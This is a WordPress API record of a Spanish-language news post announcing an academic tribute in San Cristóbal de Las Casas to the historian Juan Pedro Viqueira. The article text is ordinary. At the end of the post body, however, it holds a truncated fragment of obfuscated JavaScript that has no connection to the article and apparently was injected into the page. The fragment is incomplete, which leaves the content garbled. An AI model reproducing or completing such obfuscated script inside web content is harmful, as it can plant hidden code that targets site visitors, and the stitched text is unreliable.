{"id":24074,"date":"2025-09-19T02:21:37","date_gmt":"2025-09-19T02:21:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24074"},"modified":"2025-09-19T02:21:37","modified_gmt":"2025-09-19T02:21:37","slug":"academicos-rendiran-homenaje-a-juan-pedro-viqueira-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24074","title":{"rendered":"Acad\u00e9micos rendir\u00e1n homenaje a Juan Pedro Viqueira en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"626\" height=\"444\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000340853.jpg\" alt=\"\" class=\"wp-image-24075\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000340853.jpg 626w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000340853-300x213.jpg 300w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>18 de septiembre del 2025. San Crist\u00f3bal de Las Casas.- Este viernes 19 de septiembre, la Facultad de Derecho de la Universidad Aut\u00f3noma de Chiapas (Unach) ser\u00e1 sede de un doble conversatorio en memoria del historiador e investigador Juan Pedro Viqueira Alban (1954-2025), una de las voces m\u00e1s destacadas en el estudio de las sociedades ind\u00edgenas en M\u00e9xico.<\/p>\n\n\n\n<p>La jornada acad\u00e9mica, que se desarrollar\u00e1 en el auditorio ubicado en la antigua iglesia de San Agust\u00edn, reunir\u00e1 a colegas, amigos y especialistas de distintas instituciones, quienes compartir\u00e1n reflexiones sobre la trayectoria y aportaciones de Viqueira, considerado referente en la investigaci\u00f3n hist\u00f3rica y antropol\u00f3gica de la regi\u00f3n.<\/p>\n\n\n\n<p>El organizador del encuentro, Jos\u00e9 Javier Guill\u00e9n, explic\u00f3 que los conversatorios buscan generar un espacio de an\u00e1lisis e intercambio de ideas que permitan dimensionar la relevancia de la obra del investigador, cuya labor marc\u00f3 un antes y un despu\u00e9s en el entendimiento de las din\u00e1micas sociales de los pueblos originarios.<\/p>\n\n\n\n<p>La cita est\u00e1 programada para las 16:00 horas y ser\u00e1 abierta a la comunidad acad\u00e9mica y al p\u00fablico interesado en conocer m\u00e1s sobre la vida y legado de quien dedic\u00f3 m\u00e1s de cuatro d\u00e9cadas a la investigaci\u00f3n y docencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal18 de septiembre del 2025. San Crist\u00f3bal de Las Casas.- Este viernes 19 de septiembre, la Facultad de Derecho de la Universidad Aut\u00f3noma de Chiapas (Unach) ser\u00e1 sede de un doble conversatorio en memoria del historiador e investigador Juan Pedro Viqueira Alban (1954-2025), una de las voces m\u00e1s destacadas en el estudio de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24075,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-24074","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24074","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24074"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24074\/revisions"}],"predecessor-version":[{"id":24076,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24074\/revisions\/24076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24075"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24074"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24074"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24074"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}